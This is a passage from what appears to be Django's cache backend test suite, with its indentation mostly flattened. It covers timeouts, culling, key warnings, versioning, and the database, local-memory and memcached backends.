self.assertIs(cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1), True)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', None), True)
self.assertEqual(cache.get('key2'), 'ham')
self.assertIs(cache.add('key1', 'new eggs', None), False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
self.assertIs(cache.touch('key5', timeout=None), True)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
self.assertIs(cache.add('key2', 'ham', 0), True)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
self.assertIs(cache.touch('key5', timeout=0), True)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache_name, initial_count, final_count):
try:
cull_cache = caches[cull_cache_name]
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test('cull', 50, 29)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 19)
def test_cull_delete_when_store_empty(self):
try:
cull_cache = caches['cull']
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
old_max_entries = cull_cache._max_entries
# Force _cull to delete on first cached record.
cull_cache._max_entries = -1
try:
cull_cache.set('force_cull_delete', 'value', 1000)
self.assertIs(cull_cache.has_key('force_cull_delete'), True)
finally:
cull_cache._max_entries = old_max_entries
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends should warn (except memcached that should
error) on keys that would be refused by memcached. This encourages
portable caching code without making it too difficult to use production
backends with more liberal key rules. Refs #6447.
"""
        # Mimic a custom ``make_key`` method being defined, since the default
        # one never triggers the warnings below.
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
try:
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertWarns(CacheKeyWarning) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.warning), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
self.assertIs(cache.add('answer1', 42, version=2), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=2), False)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=1), True)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
self.assertIs(caches['v2'].add('answer2', 42), True)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37), False)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37, version=1), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
self.assertIs(caches['v2'].add('answer3', 42, version=1), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37, version=1), False)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertIs(cache.has_key('answer1'), True)
self.assertIs(cache.has_key('answer1', version=1), True)
self.assertIs(cache.has_key('answer1', version=2), False)
self.assertIs(caches['v2'].has_key('answer1'), False)
self.assertIs(caches['v2'].has_key('answer1', version=1), True)
self.assertIs(caches['v2'].has_key('answer1', version=2), False)
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertIs(cache.delete('answer1'), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertIs(cache.delete('answer2', version=2), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertIs(caches['v2'].delete('answer3'), True)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertIs(caches['v2'].delete('answer4', version=1), True)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertEqual(cache.incr('answer1'), 38)
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertEqual(cache.decr('answer1'), 37)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertEqual(cache.incr('answer2', version=2), 43)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
self.assertEqual(cache.decr('answer2', version=2), 42)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertEqual(caches['v2'].incr('answer3'), 43)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
self.assertEqual(caches['v2'].decr('answer3'), 42)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertEqual(caches['v2'].incr('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
self.assertEqual(caches['v2'].decr('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
cache.set('null', None)
if self.supports_get_with_default:
self.assertEqual(cache.incr_version('null'), 2)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.incr_version('null')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
cache.set('null', None, version=2)
if self.supports_get_with_default:
self.assertEqual(cache.decr_version('null', version=2), 1)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.decr_version('null', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
fetch_middleware = FetchFromCacheMiddleware(empty_response)
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
content = 'Testing cookie serialization.'
def get_response(req):
response = HttpResponse(content)
response.set_cookie('foo', 'bar')
return response
update_middleware = UpdateCacheMiddleware(get_response)
update_middleware.cache = cache
response = update_middleware(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
UpdateCacheMiddleware(lambda req: get_cache_data)(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertIsNone(cache.get_or_set('null', None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
self.assertIsNone(cache.get_or_set('null', lambda: None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_cull_count_queries(self):
old_max_entries = cache._max_entries
# Force _cull to delete on first cached record.
cache._max_entries = -1
with CaptureQueriesContext(connection) as captured_queries:
try:
cache.set('force_cull', 'value', 1000)
finally:
cache._max_entries = old_max_entries
num_count_queries = sum('COUNT' in query['sql'] for query in captured_queries)
self.assertEqual(num_count_queries, 1)
def test_delete_cursor_rowcount(self):
"""
The rowcount attribute should not be checked on a closed cursor.
"""
class MockedCursorWrapper(CursorWrapper):
is_closed = False
def close(self):
self.cursor.close()
self.is_closed = True
@property
def rowcount(self):
if self.is_closed:
raise Exception('Cursor is closed.')
return self.cursor.rowcount
cache.set_many({'a': 1, 'b': 2})
with mock.patch('django.db.backends.utils.CursorWrapper', MockedCursorWrapper):
self.assertIs(cache.delete('a'), True)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
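# With this router installed, allow_migrate() only returns True for the 'other'
# alias, which is why createcachetable skips 'default' and creates the table on
# 'other' in the test below.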
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
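# Pickling a PicklingSideEffect instance invokes __getstate__, which snapshots
# whether the LocMemCache lock was held at that moment; the locking test below
# relies on this to show that pickling happens outside the cache's lock.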
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
self.assertIs(cache.add('add', bad_obj), True)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
self.assertEqual(cache.incr(key), 2)
self.assertEqual(expire, cache._expire_info[_key])
self.assertEqual(cache.decr(key), 1)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.incr(key), key + 1)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# The memcached backend isn't guaranteed to be available. To check it, the test
# settings file needs to contain at least one cache backend setting that points
# at your memcached server.
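# A hypothetical example of a suitable settings.CACHES entry (the server
# address is an assumption):
#
#     CACHES = {
#         'default': {
#             'BACKEND': 'django.core.cache.backends.memcached.PyMemcacheCache',
#             'LOCATION': '127.0.0.1:11211',
#         },
#     }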
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
PyMemcacheCache_params = configured_caches.get('django.core.cache.backends.memcached.PyMemcacheCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def _perform_invalid_key_test(self, key, expected_warning):
"""
While other backends merely warn, memcached should raise for an invalid
key.
"""
msg = expected_warning.replace(key, cache.make_key(key))
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertRaises(InvalidCacheKey) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.exception), msg)
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_memcached_deletes_key_on_failed_set(self):
        # By default memcached allows objects up to 1MB. For the cache_db session
        # backend to always use the current session, memcached needs to delete
        # the old key if it fails to set the new value.
max_value_length = 2 ** 20
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Most clients (e.g. pymemcache or pylibmc) raise when the value is
# too large. This test is primarily checking that the key was
# deleted, so the return/exception behavior for the set() itself is
# not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._class, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch.object(cache._class, 'set_multi', side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
# RemovedInDjango41Warning.
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
@ignore_warnings(category=RemovedInDjango41Warning)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
supports_get_with_default = False
incr_decr_type_error = ValueError
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
def test_default_used_when_none_is_set(self):
"""
python-memcached doesn't support default in get() so this test
overrides the one in BaseCacheTests.
"""
cache.set('key_default_none', None)
self.assertEqual(cache.get('key_default_none', default='default'), 'default')
class MemcachedCacheDeprecationTests(SimpleTestCase):
def test_warning(self):
from django.core.cache.backends.memcached import MemcachedCache
# Remove warnings filter on MemcachedCache deprecation warning, added
# in runtests.py.
warnings.filterwarnings(
'error',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
try:
msg = (
'MemcachedCache is deprecated in favor of PyMemcacheCache and '
